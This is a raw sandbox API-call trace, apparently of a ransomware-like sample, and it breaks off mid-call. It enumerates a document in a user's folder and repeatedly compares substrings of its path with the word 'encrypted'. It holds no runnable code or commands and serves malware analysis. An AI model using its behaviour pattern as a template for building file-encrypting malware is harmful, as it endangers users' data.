FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x4645edc0, ftLastWriteTime.dwHighDateTime=0x1d5bb0b, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x0, dwReserved1=0x777648, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0x7c20c0 [0034.196] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="463pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pkp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kp6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oz8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WLE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LE1r.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.200] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 